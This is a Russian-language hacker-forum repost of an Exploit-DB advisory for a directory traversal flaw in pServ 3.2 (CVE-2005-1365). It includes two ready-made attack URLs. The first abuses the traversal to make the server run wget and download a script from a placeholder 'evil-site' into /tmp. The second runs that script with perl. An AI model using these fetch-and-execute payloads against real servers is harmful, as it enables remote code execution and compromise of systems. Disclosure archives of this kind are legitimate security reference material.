Exploit pserv 3.2 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25669
Проверка EDB
  1. Пройдено
Автор
CLAUS R. F. OVERBECK
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2005-1365
Дата публикации
2005-05-16
Код:
source: https://www.securityfocus.com/bid/13642/info

pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.

This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable. 

The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl
 
Источник
www.exploit-db.com

Похожие темы